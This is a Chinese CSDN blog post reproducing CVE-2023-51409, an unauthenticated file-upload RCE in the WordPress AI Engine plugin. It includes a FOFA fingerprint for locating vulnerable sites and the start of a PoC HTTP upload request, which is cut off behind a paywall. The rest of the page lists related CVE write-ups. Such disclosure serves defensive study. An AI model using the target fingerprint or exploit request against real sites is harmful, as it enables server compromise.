WordPress AI Engine 插件 文件上传致RCE漏洞复现(CVE-2023-51409)

于 2024-04-27 14:21:33 发布
阅读量292 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 人工智能 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138226326
版权

0x01 产品简介

AI Engine插件是WordPress中的AI一体化解决方案,包括创建聊天机器人、生成内容和图像、推荐标题和帖子摘录、支持多种人工智能引擎等功能,可以节省用户时间。

0x02 漏洞概述

WordPress AI Engine 插件upload接口存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意后门文件,执行恶意代码,获取服务器权限。

0x03 影响范围

version <= 1.9.98

0x04 复现环境

FOFA:"wp-content/plugins/ai-engine/"

0x05 漏洞复现

PoC

POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
C
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2344
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。 RARLabs WinRAR 6.23之前版本存在安全漏洞...
WordPress4.6命令执行漏洞CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3194
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
[漏洞分析]WordPress未经身份验证的远程代码执行CVE-2024-25600
网络安全知识分享
03-14 1287
Bricks
Vulfocus-WordPress远程命令执行(CVE-2016-10033)
qq_52178795的博客
06-11 482
漏洞名称:WordPress远程命令执行(CVE-2016-10033)漏洞描述:WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。当WordPress 使用 PHPMailer 组件向用户发送邮件。
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
include_voidmain的博客
06-02 1129
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
WordPress Backup Migration插件未授权RCECVE-2023-6553).txt
04-22
WordPress Backup Migration插件未授权RCECVE-2023-6553).txt
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
需要测试vCenter 6.5 Linux(VCSA)/窗口等待测试vCenter 6.7 Linux(VCSA)/窗口等待测试vCenter 7.0 Linux(VCSA)/窗口等待测试细节突破为任意文件上传存在问题的接口为/ui/vropspluginui/rest/services/...
pfSense防火墙从XSS到RCECVE-2023-42325 CVE-2023-42327).txt
最新发布
04-22
pfSense防火墙从XSS到RCECVE-2023-42325 CVE-2023-42327).txt
漏洞复现WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 796
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5200
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress BuddyPress 存在越权漏洞RCECVE-2021-21389)
xiaobai_20190815的博客
05-11 2971
一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题 二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像,docker pull hoangkien10
wordpress 命令执行 (CVE-2016-10033)复现
YouthBelief的博客
11-04 1839
wordpress 远程命令执行 (CVE-2018-15877) wordpress 远程命令执行 (CVE-2018-15877)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 wordpress 远程命令执行 (CVE-2018-15877) WordPressWordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。 0x01 漏洞描述 Plainview Activity Monitor plugin是使用
WordPress曝未经授权的密码重置漏洞CVE-2017-8295 )
weixin_33860553的博客
08-01 624
漏洞提交者:Dawid Golunski 漏洞编号:CVE-2017-8295 发布日期:2017-05-03 修订版本:1.0 漏洞危害:中/高 一、漏洞 WordPress内核<= 4.7.4存在未经授权的密码重置(0day) 二、背景 WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2...
Wordpress(CVE-2019-17671)未授权访问漏洞复现
m0_48520508的博客
07-29 981
0x01简介 WordPress是全球最棒的免费博客(Blog)发布平台之一,在GNU通用公共许可证下授权发布,它基于经典的PHP+MySQL搭建而来,其中PHP用于编写相应的操作代码、生成页面,MySQL数据库则用于保存用户发布和编辑的内容。用户可以在支持PHP和MySQL数据库的服务器上架设自己的博客平台。 WordPress的出现,给许多人喜爱自行架设blog站台的网民有了更好的选择。现如今,Wordpress在国外已经非常流行,就连大名鼎鼎的Mozilla.org,也是基于Wordpress搭建,而
wordpress 查看未经身份验证的文章(cve-2019-17671未授权访问)漏洞复现
Ping_Pig的博客
11-04 737
漏洞产生原因: 该漏洞由于程序没有正确处理静态查询,攻击者可利用该漏洞未经认证查看部分内容 影响版本:<=5.2.3 漏洞复现过程: 登录后台创建一个新的页面: 点击发布 然后可以在所有页面的地方看到创建完毕: 创建成功后在页面列表处会有状态显示,没有状态的默认为公开 将页面设置为私有: 点击页面编辑 选择状态: 然后我们退出后台模仿正...
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 -墨者学院
小白鸽
07-31 1840
01 背景介绍 近日,WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。 远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。 02 影响范围 Plainview Activity Monitor plugin version <= 20161228 03 利用方式 默认后台 wp-login.php Activity
CVE-2017-15715漏洞和SSI-RCE漏洞
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件中的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本)。如果目标服务器受到此漏洞的影响,攻击者可以利用它执行任意代码,可能导致敏感信息泄露或服务器完全被控制。 SSI-RCE漏洞是一种服务器端包含(SSI)漏洞,可能导致远程命令执行。SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码来执行任意命令。这种漏洞可能会导致服务器被完全控制,从而造成数据泄露、服务拒绝或其他恶意行为。 请注意,对于具体的漏洞信息和修复建议,请查阅相应漏洞CVE编号或相关安全公告以获取更准确和详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值